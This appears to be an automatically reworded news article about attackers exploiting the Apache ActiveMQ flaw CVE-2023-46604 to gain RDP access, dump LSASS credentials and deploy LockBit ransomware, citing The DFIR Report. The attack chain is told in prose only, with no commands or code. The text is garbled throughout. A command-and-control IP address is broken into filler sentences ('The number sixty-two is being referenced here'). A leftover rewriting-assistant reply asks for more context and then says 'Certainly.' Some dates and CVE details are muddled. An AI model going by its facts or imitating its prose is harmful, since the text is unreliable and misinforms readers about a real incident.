Malicious actors exploit an Apache ActiveMQ server vulnerability

Malicious actors exploit an Apache ActiveMQ server vulnerability for remote desktop protocol access and deployment of the LockBit ransomware.

An active security flaw within Apache ActiveMQ was maliciously leveraged by attackers, resulting in widespread execution of the LockBit ransomware on corporate networks.

Exploiting CVE-2023-46604—a vulnerability affecting ActiveMQ's messaging service—hackers gained unauthorized entry onto an unsecured Windows machine through its Remote Desktop connection. This breach allowed them to execute malicious commands remotely for approximately nineteen consecutive working days before fully compromising all targeted systems using this method.

In February of this year, early-mid 2024, an attacker employed a custom-built protocol message directed at an open-source Apache ActiveMQ instance available for public access.

An attack led to loading an external Java-based Spring XML script on the system, prompting it to execute a Metasploit payload through Microsoft's certutil tool on a Windows machine.

Upon completion of execution, the stage initiated communication through its control mechanism towards a server under the operator's direction hosted on IP address 166. The number sixty-two is being referenced here. The number is 100 [. ]. The number fifty-two is being referenced here.

In about forty minutes after establishing an early position, the assailant managed to advance to system administrator levels by accessing Lsass processes' memory contents at their base camp node.

DFI researchers discovered that intruders exited their target system after two days into the breach; however, since an unpatched Apache ActiveMQ instance persisted, they continued using the identical attack vector.

After eighteen days since the initial intrusion, cybercriminals reappeared employing the same vulnerability exploit method as before—only altering file names during their attack sequence.

With an unsecured service account's secret keys snatched stealthily while penetrating the system initially, hackers gained immediate access through this compromised entry point.

Initial Access (Source - The DFIR Report)

Initial Access (Source – The DFIR Report)

Upon their arrival, the assailants disclosed they had gained administrative rights over the system's infrastructure before executing an obfuscated version of the "Advanced IP Scanner" software—crafted to mimic the appearance of "SoftPerfect Network Scanner"—aimed at identifying active devices throughout the premises.

Subsequently, they transferred LockBit ransomware binaries onto server and workstation machines through Remote Desktop Protocol connections, employing two distinct files named LB3. The expression "exe" followed by "LB3_pass" is not clear; please provide more context for a meaningful rephrased version. Certainly. Here's an alternative version of your request:

Files stored on dedicated server environments were infected by ransomware using particular command-line inputs such as paths and passwords; however, infections occurred more easily elsewhere via straightforward double-clicks within the Windows File Explorer window.

The ransom messages revealed where victims accessed the Session instant-messaging platform instead of relying on LockBit's main servers, suggesting it came from someone else who created the malware independently using the stolen LockBit code.

The cumulative time required for ransomware was recorded as approximately four hundred nineteen hours—equivalent to nearly eighteen days spanning from initial infection until complete data encryption occurred. Without detection during the initial attack stage, the hackers could only gain access for less than an hour after their entry into the system.

CVE ID CVSS Score Description

The vulnerability CVE-2023-46604 has been assigned an ID of 10. The Apache ActiveMQ application suffers from remote code execution vulnerabilities due to an openwire classinfo command being executed remotely.

Credential Theft Driving Lateral Movement

Following successful SYSTEM-level penetration at the initial foothold site, the Metasploit tool exploited the LSASS processes of multiple targets concurrently in its inaugural attack phase.